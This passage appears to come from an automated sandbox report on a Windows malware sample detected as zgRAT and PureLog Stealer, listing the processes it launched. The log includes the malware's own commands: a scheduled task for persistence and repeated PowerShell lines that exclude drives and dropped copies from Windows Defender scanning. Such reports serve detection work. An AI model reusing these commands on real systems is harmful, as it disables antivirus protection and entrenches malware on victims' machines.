                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:7
                                                          Start time:12:17:19
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9645.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCBECAF1EB4DD4ACB9C3DAD38B7F1421.TMP"
                                                          Imagebase:0x7ff6cdfe0000
                                                          File size:52'744 bytes
                                                          MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:8
                                                          Start time:12:17:19
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hbljmznv\hbljmznv.cmdline"
                                                          Imagebase:0x7ff6686a0000
                                                          File size:2'759'232 bytes
                                                          MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:9
                                                          Start time:12:17:19
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:10
                                                          Start time:12:17:19
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES97EB.tmp" "c:\Windows\System32\CSC6D484021F1A3499F944D7EA066CF3EF7.TMP"
                                                          Imagebase:0x7ff6cdfe0000
                                                          File size:52'744 bytes
                                                          MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:11
                                                          Start time:12:17:20
                                                          Start date:20/10/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\tqeRXJHxPWPPoiNqjJeEYdv.exe"
                                                          Imagebase:0x8f0000
                                                          File size:16'272'384 bytes
                                                          MD5 hash:8213A9C837181823A4D58728637EAEB5
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 66%, ReversingLabs
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:12
                                                          Start time:12:17:20
                                                          Start date:20/10/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\tqeRXJHxPWPPoiNqjJeEYdv.exe"
                                                          Imagebase:0xc20000
                                                          File size:16'272'384 bytes
                                                          MD5 hash:8213A9C837181823A4D58728637EAEB5
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:27
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "9XHFe6y4Dj9" /sc MINUTE /mo 8 /tr "'C:\Users\user\Desktop\9XHFe6y4Dj.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff6284c0000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:28
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                                                          Imagebase:0x7ff7be880000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:29
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                                                          Imagebase:0x7ff7be880000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:30
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:false

                                                          Target ID:31
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                                                          Imagebase:0x7ff7be880000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:32
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          Target ID:33
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                                                          Imagebase:0x7ff7be880000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:34
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          Target ID:35
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                                                          Imagebase:0x7ff7be880000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:36
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          Target ID:37
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                                                          Imagebase:0x7ff7be880000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:38
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                                                          Imagebase:0x7ff7be880000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:39
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                                                          Imagebase:0x7ff7be880000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:40
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          Target ID:41
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          Target ID:42
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          Target ID:43
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                                                          Imagebase:0x7ff7be880000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:44
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          Target ID:45
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                                                          Imagebase:0x7ff7be880000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:46
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          Target ID:47
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                                                          Imagebase:0x7ff7be880000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:48
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          Target ID:49
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                                                          Imagebase:0x7ff7be880000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:50
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows mail\tqeRXJHxPWPPoiNqjJeEYdv.exe'
                                                          Imagebase:0x7ff7be880000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:51
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\tqeRXJHxPWPPoiNqjJeEYdv.exe'
                                                          Imagebase:0x7ff7be880000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:52
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\tqeRXJHxPWPPoiNqjJeEYdv.exe'
                                                          Imagebase:0x7ff7be880000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:53
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          Target ID:54
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Defender\Platform\tqeRXJHxPWPPoiNqjJeEYdv.exe'
                                                          Imagebase:0x7ff7be880000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:55
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          Target ID:56
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe'
                                                          Imagebase:0x7ff7be880000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:57
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          Target ID:58
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9XHFe6y4Dj.exe'
                                                          Imagebase:0x7ff7be880000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:59
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          Target ID:60
                                                          Start time:12:17:22
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          Target ID:61
                                                          Start time:12:17:22
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          Target ID:62
                                                          Start time:12:17:22
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          Target ID:63
                                                          Start time:12:17:22
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          Target ID:64
                                                          Start time:12:17:22
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\lE7emhVBWP.bat"
                                                          Imagebase:0x7ff68cac0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:65
                                                          Start time:12:17:23
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:66
                                                          Start time:12:17:23
                                                          Start date:20/10/2024
                                                          Path:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          Imagebase:0xc10000
                                                          File size:16'272'384 bytes
                                                          MD5 hash:8213A9C837181823A4D58728637EAEB5
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:68
                                                          Start time:12:17:25
                                                          Start date:20/10/2024
                                                          Path:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          Imagebase:0x3b0000
                                                          File size:16'272'384 bytes
                                                          MD5 hash:8213A9C837181823A4D58728637EAEB5
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:69
                                                          Start time:12:17:26
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\chcp.com
                                                          Wow64 process (32bit):false
                                                          Commandline:chcp 65001
                                                          Imagebase:0x7ff7a16a0000
                                                          File size:14'848 bytes
                                                          MD5 hash:33395C4732A49065EA72590B14B64F32
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:70
                                                          Start time:12:17:28
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\w32tm.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                          Imagebase:0x7ff726700000
                                                          File size:108'032 bytes
                                                          MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:71
                                                          Start time:12:17:34
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe"
                                                          Imagebase:0x640000
                                                          File size:16'272'384 bytes
                                                          MD5 hash:8213A9C837181823A4D58728637EAEB5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Antivirus matches:
                                                          • Detection: 66%, ReversingLabs
                                                          Has exited:false

                                                          Target ID:72
                                                          Start time:12:17:36
                                                          Start date:20/10/2024
                                                          Path:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\Desktop\9XHFe6y4Dj.exe"
                                                          Imagebase:0x110000
                                                          File size:16'272'384 bytes
                                                          MD5 hash:8213A9C837181823A4D58728637EAEB5
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:73
                                                          Start time:12:17:48
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                          Imagebase:0x7ff6ef0c0000
                                                          File size:496'640 bytes
                                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                          Has elevated privileges:true
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          Target ID:74
                                                          Start time:12:17:48
                                                          Start date:20/10/2024
                                                          Path:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\Desktop\9XHFe6y4Dj.exe"
                                                          Imagebase:0xcd0000
                                                          File size:16'272'384 bytes
                                                          MD5 hash:8213A9C837181823A4D58728637EAEB5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:76
                                                          Start time:12:17:54
